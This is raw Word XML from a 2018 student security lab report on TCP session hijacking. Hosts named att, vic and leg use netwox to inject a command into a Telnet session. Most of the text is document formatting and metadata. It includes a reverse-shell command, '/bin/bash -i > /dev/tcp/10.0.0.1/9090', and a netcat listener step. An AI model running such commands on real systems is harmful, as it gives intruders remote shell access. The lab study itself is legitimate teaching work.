        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal, run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006715D8">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and note the IP is </w:t>
      </w:r>
      <w:r w:rsidRPr="006715D8">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>10.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00957904">
        <w:t xml:space="preserve"> (Figure 19)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39599E15" w14:textId="636586AE" w:rsidR="006A62B3" w:rsidRDefault="006A62B3" w:rsidP="006A62B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal, start</w:t>
      </w:r>
      <w:r w:rsidR="006715D8">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006715D8">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006715D8">
        <w:t xml:space="preserve"> program to listen for connections on port 9090. (Figure 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EC9C40" w14:textId="12212158" w:rsidR="00957904" w:rsidRDefault="00957904" w:rsidP="00601C6E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7"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In another </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal, run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack from (Q7).</w:t>
      </w:r>
      <w:r w:rsidR="00B177ED">
        <w:t xml:space="preserve"> The sequence number in the attack is the acknowledgment number of the last Telnet Data packet exchanged between </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00601C6E">
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00601C6E">
        <w:t xml:space="preserve"> and leg, the acknowledge number in the attack is the next sequence number of the same packet, destination port is the port on leg that established the connection and </w:t>
      </w:r>
      <w:r w:rsidR="00B177ED">
        <w:t xml:space="preserve">payload in the attack is the </w:t>
      </w:r>
      <w:r w:rsidR="00601C6E">
        <w:t xml:space="preserve">hex of the command to create a bash shell: </w:t>
      </w:r>
      <w:r w:rsidR="00601C6E" w:rsidRPr="00601C6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00601C6E" w:rsidRPr="00601C6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00601C6E" w:rsidRPr="00601C6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00601C6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00601C6E" w:rsidRPr="00601C6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00601C6E" w:rsidRPr="00601C6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00601C6E" w:rsidRPr="00601C6E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>/10.0.0.1/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42280F09" w14:textId="2065785F" w:rsidR="00026F66" w:rsidRPr="00947AAF" w:rsidRDefault="00601C6E" w:rsidP="00026F66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack was successful because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> has access to a shell in vic. This is seen when the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> program accepts a connection by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> on port 9090 and by running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal and observing the IP as 10.0.0.3 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t>vic’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP). (Figure 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54411264" w14:textId="77777777" w:rsidR="009D1066" w:rsidRDefault="006E3FA2" w:rsidP="009D1066">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4015AAE3" wp14:editId="1B376E48">
            <wp:extent cx="4543425" cy="1104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2558"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="45434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7E35F" w14:textId="6C74F21B" w:rsidR="006E3FA2" w:rsidRDefault="009D1066" w:rsidP="009D1066">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Opening telnet port 23 in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39459E53" w14:textId="77777777" w:rsidR="009D1066" w:rsidRDefault="006E3FA2" w:rsidP="009D1066">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4D6D36" wp14:editId="6B637E2A">
            <wp:extent cx="4619625" cy="1971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62FB" w14:textId="42720F9B" w:rsidR="006E3FA2" w:rsidRDefault="009D1066" w:rsidP="009D1066">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> telnet connection from leg to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="180B524F" w14:textId="77777777" w:rsidR="009D1066" w:rsidRDefault="009D1066" w:rsidP="009D106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AEE3EC" wp14:editId="0A6A8BBC">
            <wp:extent cx="4591050" cy="2333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BA6F" w14:textId="2D958B45" w:rsidR="00214A49" w:rsidRDefault="009D1066" w:rsidP="009D1066">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> before </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1975A1B7" w14:textId="77777777" w:rsidR="009D1066" w:rsidRDefault="00A03EFB" w:rsidP="009D1066">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43566746" wp14:editId="64C4CD5B">
            <wp:extent cx="4619625" cy="3086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C1E5" w14:textId="15711E24" w:rsidR="00A03EFB" w:rsidRDefault="009D1066" w:rsidP="009D1066">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Reverse shell through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> after</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A03EFB">
      <w:head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1C3F7" w14:textId="77777777" w:rsidR="00D40B59" w:rsidRDefault="00D40B59" w:rsidP="001A664B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59AF50A6" w14:textId="77777777" w:rsidR="00D40B59" w:rsidRDefault="00D40B59" w:rsidP="001A6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IBM Plex Mono">
    <w:panose1 w:val="020B0509050000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:notTrueType/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="A000006F" w:usb1="5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92990" w14:textId="77777777" w:rsidR="00D40B59" w:rsidRDefault="00D40B59" w:rsidP="001A664B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="38CC56B8" w14:textId="77777777" w:rsidR="00D40B59" w:rsidRDefault="00D40B59" w:rsidP="001A6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5BFBBD58930B42E096E5B0AC1358B7D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9898970" w14:textId="270327C3" w:rsidR="001A664B" w:rsidRDefault="001A664B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UMME SALMA Gadriwala</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="3C6A5AB7" w14:textId="3C4C0695" w:rsidR="001A664B" w:rsidRDefault="001A664B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F0A6451A109844D3A2D02B8BF56E0E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Lab 4 – March 30, 2018</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
  </w:p>
  <w:p w14:paraId="45BB7699" w14:textId="77777777" w:rsidR="001A664B" w:rsidRDefault="001A66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22DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78F83F96"/>
    <w:lvl w:ilvl="0" w:tplc="BC6E3B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612FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6C8EAE6"/>
    <w:lvl w:ilvl="0" w:tplc="E606F692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1F2A1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A42A5576"/>
    <w:lvl w:ilvl="0" w:tplc="179E46E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria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0E1346"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A8E34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87"/>
    <w:rsid w:val="0000668B"/>
    <w:rsid w:val="000101C5"/>
    <w:rsid w:val="00012484"/>
    <w:rsid w:val="00026F66"/>
    <w:rsid w:val="00031E1C"/>
    <w:rsid w:val="00074A07"/>
    <w:rsid w:val="00090786"/>
    <w:rsid w:val="000B2E48"/>
    <w:rsid w:val="0010533B"/>
    <w:rsid w:val="00135802"/>
    <w:rsid w:val="00161CFF"/>
    <w:rsid w:val="00172AB8"/>
    <w:rsid w:val="00183E5E"/>
    <w:rsid w:val="001A664B"/>
    <w:rsid w:val="00214A49"/>
    <w:rsid w:val="00233CB8"/>
    <w:rsid w:val="0025759C"/>
    <w:rsid w:val="00323250"/>
    <w:rsid w:val="00354F28"/>
    <w:rsid w:val="00373B54"/>
    <w:rsid w:val="00377B55"/>
    <w:rsid w:val="003A5E8A"/>
    <w:rsid w:val="003B63ED"/>
    <w:rsid w:val="003E13C8"/>
    <w:rsid w:val="003E43B1"/>
    <w:rsid w:val="00447DE8"/>
    <w:rsid w:val="00450E0D"/>
    <w:rsid w:val="0046010A"/>
    <w:rsid w:val="004941EC"/>
    <w:rsid w:val="004E6A2A"/>
    <w:rsid w:val="005139E3"/>
    <w:rsid w:val="00527F0E"/>
    <w:rsid w:val="00556B58"/>
    <w:rsid w:val="005841CB"/>
    <w:rsid w:val="00591D8E"/>
    <w:rsid w:val="00601C6E"/>
    <w:rsid w:val="00614AB2"/>
    <w:rsid w:val="00623AA6"/>
    <w:rsid w:val="006715D8"/>
    <w:rsid w:val="006A62B3"/>
    <w:rsid w:val="006C51BA"/>
    <w:rsid w:val="006E3FA2"/>
    <w:rsid w:val="00700984"/>
    <w:rsid w:val="007733A6"/>
    <w:rsid w:val="007C72A9"/>
    <w:rsid w:val="007D5F0C"/>
    <w:rsid w:val="00864047"/>
    <w:rsid w:val="008B0F87"/>
    <w:rsid w:val="008D2193"/>
    <w:rsid w:val="00915F7A"/>
    <w:rsid w:val="00947AAF"/>
    <w:rsid w:val="00957904"/>
    <w:rsid w:val="00973D15"/>
    <w:rsid w:val="009D1066"/>
    <w:rsid w:val="00A03EFB"/>
    <w:rsid w:val="00A80D14"/>
    <w:rsid w:val="00AB54E1"/>
    <w:rsid w:val="00B00F33"/>
    <w:rsid w:val="00B177ED"/>
    <w:rsid w:val="00B23348"/>
    <w:rsid w:val="00B60C7B"/>
    <w:rsid w:val="00B67A1B"/>
    <w:rsid w:val="00BD1FA2"/>
    <w:rsid w:val="00BD2612"/>
    <w:rsid w:val="00C522E9"/>
    <w:rsid w:val="00C8287D"/>
    <w:rsid w:val="00C861E1"/>
    <w:rsid w:val="00CC0CA3"/>
    <w:rsid w:val="00D07229"/>
    <w:rsid w:val="00D141FC"/>
    <w:rsid w:val="00D40B59"/>
    <w:rsid w:val="00DA4C2D"/>
    <w:rsid w:val="00DB1A52"/>
    <w:rsid w:val="00DE4528"/>
    <w:rsid w:val="00DE6AFA"/>
    <w:rsid w:val="00DF5722"/>
    <w:rsid w:val="00E12855"/>
    <w:rsid w:val="00E249E2"/>
    <w:rsid w:val="00E46B2D"/>
    <w:rsid w:val="00E72837"/>
    <w:rsid w:val="00E83299"/>
    <w:rsid w:val="00EB5237"/>
    <w:rsid w:val="00EC4B16"/>
    <w:rsid w:val="00ED619A"/>
    <w:rsid w:val="00F33795"/>
    <w:rsid w:val="00F75D06"/>
    <w:rsid w:val="00FC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81D4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{24A63D0D-5C82-4207-91CD-FF8C754B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F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64B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001A6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64B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00864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047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E46B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2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FBBD58930B42E096E5B0AC1358B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01F5F-2231-4758-8D38-C8627C320825}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00264722" w:rsidRDefault="009B63A4" w:rsidP="009B63A4">
          <w:pPr>
            <w:pStyle w:val="5BFBBD58930B42E096E5B0AC1358B7DF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F0A6451A109844D3A2D02B8BF56E0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EB94D-530E-4A7D-94E3-76513E55C449}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00264722" w:rsidRDefault="009B63A4" w:rsidP="009B63A4">
          <w:pPr>
            <w:pStyle w:val="F0A6451A109844D3A2D02B8BF56E0E1A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IBM Plex Mono">
    <w:panose1 w:val="020B0509050000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:notTrueType/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="A000006F" w:usb1="5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A4"/>
    <w:rsid w:val="00264722"/>
    <w:rsid w:val="004D5A23"/>
    <w:rsid w:val="006D2F48"/>
    <w:rsid w:val="009B63A4"/>
    <w:rsid w:val="00B5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FBBD58930B42E096E5B0AC1358B7DF">
    <w:name w:val="5BFBBD58930B42E096E5B0AC1358B7DF"/>
    <w:rsid w:val="009B63A4"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="F0A6451A109844D3A2D02B8BF56E0E1A">
    <w:name w:val="F0A6451A109844D3A2D02B8BF56E0E1A"/>
    <w:rsid w:val="009B63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 – March 30, 2018</vt:lpstr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– March 30, 2018</dc:title>
  <dc:subject/>
  <dc:creator>UMME SALMA Gadriwala</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>UMME SALMA Gadriwala</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2018-03-28T23:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-28T23:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-28T23:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>